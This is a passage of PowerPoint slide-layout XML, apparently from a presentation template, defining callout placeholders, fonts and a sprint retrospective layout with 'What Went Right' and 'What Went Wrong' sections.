            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463823" y="2879493"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40734"/>
              <a:gd name="adj2" fmla="val 75007"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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5A1BBAC9-5A35-4087-9F89-936250AEBB0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31EBD6-1B27-4DB0-95DC-D2ECD2D073D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005235" y="2879493"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42210"/>
              <a:gd name="adj2" fmla="val 73444"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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a:extLst>
              <a:ext uri="{4AB74AEF-D5DD-4390-818E-D359A73BECE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5ECD285-D7FC-4AC8-8596-1054E1D372E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3686984"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40734"/>
              <a:gd name="adj2" fmla="val 73444"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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9C152AE7-56FD-46F5-9311-AFD719EA27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C144D8B-EDA7-4464-BD5B-DFD40736F3C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922411" y="3686984"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44425"/>
              <a:gd name="adj2" fmla="val 76571"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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4">
            <a:extLst>
              <a:ext uri="{B62AF050-9B76-45A4-95FB-56DAEBA36C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2FA532-A646-4B1D-A923-8FC665E91DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463823" y="3686984"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39995"/>
              <a:gd name="adj2" fmla="val 75007"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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a:extLst>
              <a:ext uri="{446C8C45-7B32-4F4A-8D4C-A0977B283D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CBB7DB-DEAF-4208-A956-0B28F14E0D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005235" y="3686984"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41472"/>
              <a:gd name="adj2" fmla="val 73444"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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6">
            <a:extLst>
              <a:ext uri="{900A03D6-D721-4828-9E71-59F40FFECA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C612F2-EE20-4167-BC75-A57128381C41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6554238" y="3686984"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42210"/>
              <a:gd name="adj2" fmla="val 78134"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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E7F9D19B-5BC0-4DDA-B5A7-C9EF300A13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D599EE-CF4C-4027-93E0-1284323CB0B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546646" y="2887084"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41472"/>
              <a:gd name="adj2" fmla="val 76571"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{73CAEE8F-E003-4178-9DE1-11848CA1BE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A26C72-9845-4D8D-B976-156C3F986143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="1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8BD2FC62-6BFA-45B0-BD54-B6C5BB16FD5C}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{044AC1B9-4A0A-4D77-BEB5-9D8169C87AF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B141E54-2486-4634-8691-8AE964B1BD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>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9396A5A4-3CE3-425D-943A-C529CAC0326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print Backlog">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{6D5926E2-13A7-4B62-9358-B323251DD8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AFB5ED8-DAE6-4092-B52E-661ED576A11D}"/>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7919DDCD-7441-438B-B73B-78C214F2C4F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11408EF-ABEC-4643-A65A-3AD0E9F0DBCB}"/>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080DF4E2-E8CD-4731-9C84-0913D1AAD7E1}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{06A6FCB6-BE8D-40ED-BB0D-DA11473D9A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6F3F62-235E-4DED-8356-55FE0369CB5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7972425" y="4743450"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{23E984D7-8173-4676-BAE9-06038478341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B16602D-84EB-441A-8A0B-5C11A6CD4B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="695325" y="3367125"/>
            <a:ext cx="3248025" cy="285750"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="104775" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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Headline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 20">
            <a:extLst>
              <a:ext uri="{0AF3EF8B-450E-488F-ACE9-536E6F8E4DB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ACF455-AD9B-4FBD-AB43-24A522CF5C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1125931"/>
            <a:ext cx="6505574" cy="688586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" baseline="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Use this slide to outline what went right and what went wrong in the most recent sprint. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Be sure to include your plan for addressing the problematic list.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{93B1E70C-D56F-4BD7-8189-4338679156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C0465BB-717C-41CC-8D14-155A0BB9E767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-1100137" y="3374717"/>
            <a:ext cx="3248025" cy="285750"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="104775" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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What Went Right</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{33E2F987-FF73-4F66-802A-87CA836500F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A3CDFE7-4F14-4F0A-B007-92B4F65F4B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2475347" y="3367125"/>
            <a:ext cx="3248025" cy="285750"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="104775" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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What Went Wrong</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{6D2A49F2-4F75-480C-9BBE-66AF1740233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D5B7220-C6B5-4CB1-85C2-4E8B186D0348}"/>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97609147-F2BB-4FB1-A7B3-78E8A222D4A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5D28EA6-19E8-4EBA-9B88-5759D3D50764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>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11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{941DA25D-2250-44A4-9E47-7763711AF5E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F977D2-62D0-438E-81AB-DBEBF7587D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="1895475"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43687"/>
              <a:gd name="adj2" fmla="val 76571"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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21771545-5EE5-4A18-8C71-9D513406334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61E6AB-50F2-4EFA-8EF2-8FA7BE513A5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="3457575"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41472"/>
              <a:gd name="adj2" fmla="val 76571"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
